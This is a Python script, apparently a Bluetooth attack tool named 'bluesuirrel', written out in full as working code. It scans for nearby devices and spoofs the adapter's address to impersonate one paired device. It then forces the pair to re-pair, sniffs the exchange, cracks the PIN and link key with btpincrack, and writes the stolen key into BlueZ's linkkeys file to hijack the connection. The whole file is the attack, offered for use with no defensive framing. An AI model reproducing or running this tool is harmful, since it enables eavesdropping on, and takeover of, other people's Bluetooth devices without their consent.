#!/usr/bin/python
# bluesuirrel v0.1 by ^_^

import sys, os, time
import subprocess
import threading

def getbdaddrofhci(hci_dev):
	cmd = "hciconfig " + hci_dev
	cmd_out = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
	if cmd_out[0]:
		return cmd_out[0].split('\n\n')[:-1][0].split()[5]
	else:
		print "Can't get info of hci device. Exiting..."
		sys.exit()

def changebdaddr(dev_inq, new_bdaddr):
		cmd = "./bdaddr -i %s %s" % (dev_inq, new_bdaddr)
		cmd_out = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
		if 'Address changed' in cmd_out[0]:
			cmd = "hciconfig -a %s reset" % (dev_inq)
			cmd_out = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
			if cmd_out !=('',''):
				return False
		
		spoofed_bdaddr = getbdaddrofhci(dev_inq)
		if spoofed_bdaddr == new_bdaddr:
			return True
		else:
			baddr = new_bdaddr.upper().split(":")
			cmd = "./bccmd -d %s psset -r bdaddr 0x%s 0x%s 0x%s 0x%s 0x%s 0x%s 0x%s 0x%s" % (
				dev_inq, baddr[3], "00", baddr[5], baddr[4], baddr[2], "00", baddr[1], baddr[0])
			subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
			if spoofed_bdaddr == new_bdaddr:
				return False
			else:
				return True

class sniff_sync (threading.Thread):
    def __init__ (self, sniff_dev, master, slave):
        threading.Thread.__init__(self)
        self.finished = threading.Event()
        self.sniff_dev = sniff_dev
	self.master = master
	self.slave = slave
    def stop (self):
        self.finished.set()
        self.join()
    def run (self):
        while not self.finished.isSet():
		os.popen("./frontline -d %s -s" % (self.sniff_dev))
		os.popen("./frontline -d %s -f 7" % (self.sniff_dev))
		os.popen("./frontline -d %s -S %s@%s" % (self.sniff_dev, self.master, self.slave))
		print "Synched."
		time.sleep(30)

hcidevs = []
n = 0
cmd_out = subprocess.Popen("hciconfig",stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
if cmd_out[0]:
	elements = cmd_out[0].split('\n\n')[:-1]
	for element in elements:
		n = n+1
		if 'RAW' in element.split():
			hcidevs.append((n,element[:4],'(RAW mode)'))
		else:
			hcidevs.append((n,element[:4],''))
else:
	print "Can't find any hci device. Exiting..."
	sys.exit()
		
print "found HCI devices: "
for a in hcidevs: print "   %s. %s %s" % (a[0],a[1],a[2])

n = raw_input("> enter number of sniffer device: ")
dev_sniff = hcidevs[int(n)-1][1]
print "setting %s for sniff" % (dev_sniff)

n = raw_input("> enter number of inq/attack device: ")
dev_inq = hcidevs[int(n)-1][1]
print "setting %s for inquiry/attack" % (dev_inq)
	
# scan
print "scanning for devices..."
scan_results = []
cmd = 'hcitool -i %s scan --class --flush' % (dev_inq)
cmd_out = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()

devices_buf = []
n = 0
if len(cmd_out[0]) > 16:
	devices = cmd_out[0].split('\n\n')
	for record in devices[1:-1]:
	    record = record.split('\n')
	    device = []
	    n = n+1
	    device.append(n) #addr
	    device.append(record[0][12:29:]) #addr
	    device.append(record[1][13:]) #name
	    device.append(record[2][14:]) #class
	    devices_buf.append(device)
	
print "found devices:"
for a in devices_buf: print "   %s. %s %s (%s)" % (a[0],a[1],a[2],a[3])

n = raw_input("> enter number of master (who starts connection) device to sniff: ")
target_master = devices_buf[int(n)-1][1]	
print "setting %s as master device to sniff" % (target_master)

n = raw_input("> enter number of slave device to sniff: ")
target_slave = devices_buf[int(n)-1][1]
print "setting %s as slave device to sniff" % (target_slave)

# unpair
n = raw_input("> do we need to break pair relationship between sniffing devices? y/n: ")
if n=='y':
	n = raw_input("> attack master or slave? m/s: ")
	if n == 'm':
		dev_to_unpair = target_master
		dev_to_emulate = target_slave
	elif n == 's':
		dev_to_unpair = target_slave
		dev_to_emulate = target_master
	
	print "doing our magic..."
	
	orig_bdaddr = getbdaddrofhci(dev_inq)

	if changebdaddr(dev_inq, dev_to_emulate):
		print "bd_addr of %s changed" % (dev_inq)
		time.sleep(20)
		print "resetting done."
	else:
		print "can't spoof bd_addr. exiting..."
		sys.exit()
		
	lkfile_name = '/var/lib/bluetooth/'+dev_to_emulate+'/linkkeys'
	lkfile = open(lkfile_name,'w')
	lkfile.write('%s 00000000000000000000000000000000 0 4\n' % (dev_to_unpair))
	lkfile.close()
				
	orig_auth = False
	cmd = "hciconfig -a %s" % (dev_inq)
	cmd_out = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE).communicate()
	if cmd_out[0]:
		a = cmd_out[0].split('\n\t')
		for b in a:
			if "AUTH" in b:
				orig_auth = True
				break

	cmd = "hciconfig -a %s auth" % (dev_inq)
	print cmd
	subprocess.Popen(cmd.split()).communicate()
		
	cmd = "hcitool -i %s cc %s"% (dev_inq, dev_to_unpair)
	print cmd
	subprocess.Popen(cmd.split()).communicate()

	if orig_auth == False:
		cmd = "hciconfig -a %s noauth" % (dev_inq)
		subprocess.Popen(cmd.split()).communicate()

	os.remove(lkfile_name)
		
	print "we did all we can."

	if changebdaddr(dev_inq, orig_bdaddr):
		print "bd_addr of %s changed to original" % (dev_inq)
		time.sleep(10)
		print "resetting done."
	else:
		print "can't change bd_addr to original. exiting..."
	

# start sniffing
n = raw_input("> ready to sniff. start? y/n: ")
if n=='y':
	sniff_sync_do = sniff_sync(dev_sniff, target_master, target_slave)
	sniff_sync_do.start()

	cf = False
	while not cf:
	    try:
		print "strart sniffing.."
		cmd_sniff = "./frontline -d %s -p -z -e"% (dev_sniff)
		sniff_out = subprocess.Popen(cmd_sniff.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
		
		cmd_btpincrack = ''
		for line in sniff_out[0].split('\n'):
			if 'btpincrack' in line:
				cmd_btpincrack = line
		if cmd_btpincrack == '':
			print "some error in sniffing. trying again."
		else:
			print "busted! waiting for stop sync..."
			sniff_sync_do.stop()
			cf = True
	    except:
		print "some error in sniffing. trying again."
	
	cmd_pincr = './'+cmd_btpincrack.replace('<master>',target_master).replace('<slave>',target_slave)
	cmd_pincr_out = subprocess.Popen(cmd_pincr.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
	linkkey = cmd_pincr_out[0].split('\n')[9:-2][0].split('        ')[1].strip().replace(' ','').upper()#linkkey
	print 'LINKKEY: '+linkkey
	pin = cmd_pincr_out[0].split('\n')[10:-1][0].split('        ')[1] .strip()
	print 'PIN: '+pin
	
	# emulating master device
	n = raw_input("> do you want to emulate master or slave device for spoofing connection? y/n: ")
	if n=='y':
		n = raw_input("> master or slave? m/s: ")
		if n=='m':
			new_addr = target_master
		elif n =='s':
			new_addr = target_slave
		orig_bdaddr = getbdaddrofhci(dev_inq)
		if changebdaddr(dev_inq, new_addr):
			print "bd_addr of %s changed" % (dev_inq)
			time.sleep(15)
			print "resetting done."
		else:
			print "can't spoof bd_addr. exiting..."
		print 'writng'
		lkfile_name = '/var/lib/bluetooth/'+new_addr+'/linkkeys'
		lkfile = open(lkfile_name,'w')
		if new_addr == target_master:
			lkfile.write('%s %s 0 4\n' % (target_slave, linkkey))
		else:
			lkfile.write('%s %s 0 4\n' % (target_master, linkkey))
		lkfile.close()
			
		print "done. try to connect!"
			
	n = raw_input("> do you want to cancel emulation (rollback your device bd_addr)? y/n: ")
	if n=='y':
		if changebdaddr(dev_inq, orig_bdaddr):
			print "bd_addr of %s changed to original" % (dev_inq)
			time.sleep(15)
			print "resetting done."
		else:
			print "can't change bd_addr to original. exiting..."
else:
	print "cancelled."